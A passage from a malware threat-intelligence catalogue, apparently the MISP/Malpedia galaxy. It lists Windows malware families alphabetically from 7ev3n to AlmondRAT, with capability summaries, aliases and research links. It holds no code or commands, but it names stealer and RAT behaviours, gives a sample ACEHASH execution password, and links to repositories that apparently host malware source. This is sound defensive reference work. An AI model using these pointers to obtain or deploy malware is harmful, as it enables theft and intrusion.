https://blog.netlab.360.com/purecrypter

https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter

7ev3n

The NJCCIC describes 7ev3n as a ransomware "that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disable various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n."

The tag is: misp-galaxy:malpedia="7ev3n"

7ev3n is also known as:

Table 2829. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n

https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n

https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/

8Base

The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in the summer of 2023. The group utilizes encryption paired with “name-and-shame” techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning varied industries. Despite the high number of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.

The tag is: misp-galaxy:malpedia="8Base"

8Base is also known as:

Table 2830. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.8base

https://socradar.io/dark-web-profile-8base-ransomware/

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://blog.talosintelligence.com/deep-dive-into-phobos-ransomware/

https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html

https://twitter.com/rivitna2/status/1674718854549831681

https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/

https://krebsonsecurity.com/2023/09/whos-behind-the-8base-ransomware-website/

https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/

https://blog.bushidotoken.net/2023/05/unmasking-ransomware-using-stylometric.html

8.t Dropper

8T_Dropper has been used by the Chinese threat actor TA428 to install Cotx RAT onto victims' machines during Operation LagTime IT. According to Proofpoint, the attack was directed against a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.

The tag is: misp-galaxy:malpedia="8.t Dropper"

8.t Dropper is also known as:

  • 8t_dropper

  • RoyalRoad

Table 2831. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper

https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba

https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf

https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign

https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/

https://community.riskiq.com/article/5fe2da7f

https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf

https://nao-sec.org/2021/01/royal-road-redive.html

https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage

https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/

https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a

https://community.riskiq.com/article/56fa1b2f

https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/

https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f

https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf

https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/

https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology

https://blog.malwarelab.pl/posts/on_the_royal_road/

https://securelist.com/cycldek-bridging-the-air-gap/97157/

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

9002 RAT

9002 RAT is a Remote Access Tool typically observed being used by an APT to control a victim's machine. It has been spread via zero-day exploits (e.g. targeting Internet Explorer) as well as via email attachments. The infection chain starts by opening a .LNK file (an OLE packager shell object) that executes a PowerShell command.

The tag is: misp-galaxy:malpedia="9002 RAT"

9002 RAT is also known as:

  • HOMEUNIX

  • Hydraq

  • McRAT

Table 2832. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.9002

https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn

https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/

http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/

https://www.secureworks.com/research/threat-profiles/bronze-express

https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf

https://www.infopoint-security.de/medien/the-elderwood-project.pdf

https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/

https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures

https://attack.mitre.org/groups/G0001/

https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html

https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html

https://www.secureworks.com/research/threat-profiles/bronze-union

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf

https://www.secureworks.com/research/threat-profiles/bronze-firestone

https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats

Abaddon

Uses Discord as C&C and has a ransomware feature.

The tag is: misp-galaxy:malpedia="Abaddon"

Abaddon is also known as:

Table 2833. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon

https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/

AbaddonPOS

MajorGeeks describes this malware as trying to locate credit card data by reading the memory of all processes except itself by first blacklisting its own PID using the GetCurrentProcessId API. Once that data is discovered, it sends this data back to a command and control server using a custom binary protocol instead of HTTP.

The tag is: misp-galaxy:malpedia="AbaddonPOS"

AbaddonPOS is also known as:

  • PinkKite

  • TinyPOS

Table 2834. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos

https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak

https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/

https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software

https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/

abantes

The tag is: misp-galaxy:malpedia="abantes"

abantes is also known as:

Table 2835. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes

Abbath Banker

The tag is: misp-galaxy:malpedia="Abbath Banker"

Abbath Banker is also known as:

Table 2836. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker

AbSent Loader

The tag is: misp-galaxy:malpedia="AbSent Loader"

AbSent Loader is also known as:

Table 2837. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader

https://github.com/Tlgyt/AbSent-Loader

https://twitter.com/cocaman/status/1260069549069733888

ACBackdoor (Windows)

A Linux backdoor that was apparently ported to Windows. This entry represents the Windows version. It appears the Linux version was written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

The tag is: misp-galaxy:malpedia="ACBackdoor (Windows)"

ACBackdoor (Windows) is also known as:

Table 2838. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor

https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/

ACEHASH

ACEHASH is described by FireEye as a combined credential harvester that consists of two components, a loader and an encrypted/compressed payload. To execute, a password is necessary (e.g. 9839D7F1A0), and the individual modules are addressed with parameters (-m, -w, -h).

The tag is: misp-galaxy:malpedia="ACEHASH"

ACEHASH is also known as:

Table 2839. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html

AcidBox

Unit42 found AcidBox in February 2019 and describes it as a malware family used by an unknown threat actor in 2017 against Russian entities, as stated by Dr.Web. It reused and improved an exploit for VirtualBox previously used by Turla. The malware itself is a modular toolkit, featuring both usermode and kernelmode components and anti-analysis techniques such as stack-based string obfuscation or dynamic XOR-encoded API usage.

The tag is: misp-galaxy:malpedia="AcidBox"

AcidBox is also known as:

  • MagicScroll

Table 2840. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox

https://blog.talosintelligence.com/2020/08/attribution-puzzle.html

https://unit42.paloaltonetworks.com/acidbox-rare-malware/

https://securelist.com/apt-trends-report-q2-2020/97937/

https://www.epicturla.com/blog/acidbox-clustering

AcridRain

AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, and credit card data from multiple browsers. It can also dump Telegram and Steam sessions, grab FileZilla recent connections, and more.

The tag is: misp-galaxy:malpedia="AcridRain"

AcridRain is also known as:

Table 2841. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain

https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/

Acronym

The tag is: misp-galaxy:malpedia="Acronym"

Acronym is also known as:

Table 2842. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym

Adamantium Thief

The tag is: misp-galaxy:malpedia="Adamantium Thief"

Adamantium Thief is also known as:

Table 2844. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.adamantium_thief

https://twitter.com/ClearskySec/status/1377176015189929989

https://github.com/LimerBoy/Adamantium-Thief

AdamLocker

Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.

The tag is: misp-galaxy:malpedia="AdamLocker"

AdamLocker is also known as:

Table 2845. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016

https://twitter.com/JaromirHorejsi/status/813712587997249536

Adhubllka

Ransomware distributed by TA547 in Australia.

The tag is: misp-galaxy:malpedia="Adhubllka"

Adhubllka is also known as:

Table 2846. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka

https://www.proofpoint.com/us/blog/security-briefs/ta547-pivots-ursnif-banking-trojan-ransomware-australian-campaign

AdvisorsBot

AdvisorsBot is a downloader named after early command and control domains that all contained the word "advisors". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.

The tag is: misp-galaxy:malpedia="AdvisorsBot"

AdvisorsBot is also known as:

Table 2848. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot

https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot

https://www.bromium.com/second-stage-attack-analysis/

AESRT

Ransomware written using .NET.

The tag is: misp-galaxy:malpedia="AESRT"

AESRT is also known as:

Table 2850. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aesrt

https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants

Agent.BTZ

The tag is: misp-galaxy:malpedia="Agent.BTZ"

Agent.BTZ is also known as:

  • ComRAT

  • Minit

  • Sun rootkit

Table 2853. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a

http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html

https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf

http://www.intezer.com/new-variants-of-agent-btz-comrat-found/

https://securelist.com/shedding-skin-turlas-fresh-faces/88069/

http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/

https://unit42.paloaltonetworks.com/ironnetinjector/

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf

https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf

https://docs.broadcom.com/doc/waterbug-attack-group

https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat

https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d

https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a

https://artemonsecurity.com/snake_whitepaper.pdf

https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/

https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.secureworks.com/research/threat-profiles/iron-hunter

https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf

https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html

https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/

Agent Tesla

A .NET-based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.

The tag is: misp-galaxy:malpedia="Agent Tesla"

Agent Tesla is also known as:

  • AgenTesla

  • AgentTesla

  • Negasteal

Table 2854. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

https://www.secureworks.com/research/darktortilla-malware-analysis

https://twitter.com/MsftSecIntel/status/1392219299696152578

https://asec.ahnlab.com/ko/29133/

https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/

https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns

https://youtu.be/hxaeWyK8gMI

https://guillaumeorlando.github.io/AgentTesla

https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/

https://www.telsy.com/download/4832/

https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/

https://lab52.io/blog/a-twisted-malware-infection-chain/

https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/

https://embee-research.ghost.io/agenttesla-full-analysis-api-hashing/

https://community.riskiq.com/article/40000d46

https://www.logpoint.com/en/blog/agentteslas-capabilities-review-detection-strategies/

https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla

https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/

https://mp.weixin.qq.com/s/X0kAIHOSldiFDthb4IsmbQ

https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware

https://securelist.com/agent-tesla-malicious-spam-campaign/107478/

https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/

https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/

http://blog.nsfocus.net/sweed-611/

https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor

https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/

https://www.inde.nz/blog/inside-agenttesla

https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/

https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/

https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout

https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware

https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html

https://www.youtube.com/watch?v=Q9_1xNbVQPY

https://blog.netlab.360.com/purecrypter

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://forensicitguy.github.io/agenttesla-vba-certutil-download/

https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/

https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware

https://inquest.net/blog/2021/11/02/adults-only-malware-lures

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf

http://ropgadget.com/posts/originlogger.html

http://www.secureworks.com/research/threat-profiles/gold-galleon

https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr

https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://unit42.paloaltonetworks.com/originlogger/

https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire

https://youtu.be/QQuRp7Qiuzg

https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html

https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/

https://blog.talosintelligence.com/ipfs-abuse/

https://blog.minerva-labs.com/preventing-agenttesla

https://menshaway.blogspot.com/2021/04/agenttesla-malware.html

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/

https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/

https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/

https://community.riskiq.com/article/56e28880

https://cert.gov.ua/article/861292

https://isc.sans.edu/diary/27666

https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/

https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant

https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/

https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4

https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/

https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting

https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf

https://isc.sans.edu/diary/rss/27092

https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/

https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1

https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/

https://youtu.be/7AifHTCldZI

https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/

https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update

https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf

https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/

https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://blog.malwarelab.pl/posts/basfu_aggah/

https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/

https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/

https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://guillaumeorlando.github.io/GorgonInfectionchain

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html

https://www.secureworks.com/research/threat-profiles/gold-galleon

https://isc.sans.edu/diary/28202

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla

https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/

https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla

https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/

https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads

https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html

https://youtu.be/BM38OshcozE

https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/

https://community.riskiq.com/article/6337984e

https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/

https://malwarebookreports.com/agent-teslaggah/

https://malwatch.github.io/posts/agent-tesla-malware-analysis/

https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/

https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.lac.co.jp/lacwatch/report/20220307_002893.html

https://isc.sans.edu/diary/27088

https://www.intrinsec.com/wp-content/uploads/2023/09/TLP-CLEAR-20230912-EN-GuLoader-Information-report.pdf

https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/

https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/

https://news.sophos.com/en-us/2020/05/14/raticate/

https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://isc.sans.edu/diary/rss/28190

https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack

https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir

AgfSpy

The agfSpy backdoor retrieves configuration and commands from its C&C server. These commands allow the backdoor to execute shell commands and send the execution results back to the server. It also enumerates directories and can list, upload, download, and execute files, among other functions. The capabilities of agfSpy are very similar to dneSpy, except each backdoor uses a different C&C server and various formats in message exchanges.

The tag is: misp-galaxy:malpedia="AgfSpy"

AgfSpy is also known as:

Table 2855. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy

https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html

Aldibot

According to the Trend Micro Threat Encyclopedia: ALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, the instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.

This malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.

This bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.

This malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.

This backdoor executes commands from a remote malicious user, effectively compromising the affected system.

The tag is: misp-galaxy:malpedia="Aldibot"

Aldibot is also known as:

Table 2859. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot

Alfonso Stealer

The tag is: misp-galaxy:malpedia="Alfonso Stealer"

Alfonso Stealer is also known as:

Table 2860. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alfonso_stealer

https://twitter.com/3xp0rtblog/status/1344352253294104576

AllaKore

AllaKore is a simple Remote Access Tool written in Delphi, first observed in 2015 but still in early stages of development. It implements the RFB protocol which uses frame buffers and thus is able to send back only the changes of screen frames to the controller, speeding up the transport and visualization control.

The tag is: misp-galaxy:malpedia="AllaKore"

AllaKore is also known as:

Table 2863. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore

https://threatmon.io/the-anatomy-of-a-sidecopy-attack-from-rar-exploits-to-allakore-rat/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf

https://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/

https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d

https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf

https://github.com/Anderson-D/AllaKore

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt

https://blog.talosintelligence.com/2021/07/sidecopy.html

https://twitter.com/_re_fox/status/1212070711206064131

https://www.team-cymru.com/post/allakore-d-the-sidecopy-train

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

AllcomeClipper

Allcome is classified as a clipper malware. Clippers are threats designed to access information saved in the clipboard (the temporary buffer where copied data is stored) and substitute it with other content. This attack mainly targets users active in the cryptocurrency sector.

The tag is: misp-galaxy:malpedia="AllcomeClipper"

AllcomeClipper is also known as:

Table 2865. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.allcomeclipper

https://www.gdatasoftware.com/blog/2022/02/37239-allcome-clipbanker-is-a-newcomer-in-malware-underground-forums

https://bazaar.abuse.ch/browse/signature/AllcomeClipper/

AlmaLocker

The tag is: misp-galaxy:malpedia="AlmaLocker"

AlmaLocker is also known as:

Table 2868. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker

AlmondRAT

